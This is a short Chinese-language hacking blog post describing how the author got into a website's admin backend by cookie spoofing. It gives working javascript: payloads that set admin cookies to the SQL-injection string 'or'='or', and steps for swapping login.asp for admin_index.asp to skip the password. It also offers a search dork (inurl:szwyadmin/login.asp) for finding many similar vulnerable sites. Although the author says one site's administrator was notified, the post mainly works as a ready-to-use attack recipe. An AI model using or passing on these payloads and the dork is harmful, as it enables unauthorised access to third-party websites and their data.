cookies欺骗入后台
过年嘛没钱赚,所以前几天都上工地搬砖了,一块砖一毛钱挺好赚的,谁要扣我我带你哈哈,不说废话入正题
无意间发现这个站点
浏览了一下发现下面有了一个管理按钮,我点了一下
后台直接出来了O__O "…
利用cookies欺骗,代码:javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));
提示了这个
点击确定三下,然后退出页面,重新打开
打开后我们把login.asp修改一下,改成默认的后台管理系统admin_index.asp
不用密码直接进入了
Ps:这个还有个关键字哦,根据他的后台地址可以扫一下很多都是类似的网站,关键字:inurl:szwyadmin/login.asp
再Ps:这个网站我已经通知管理员修补了补丁,就不让你上,你打我呀啦啦啦
热度(4)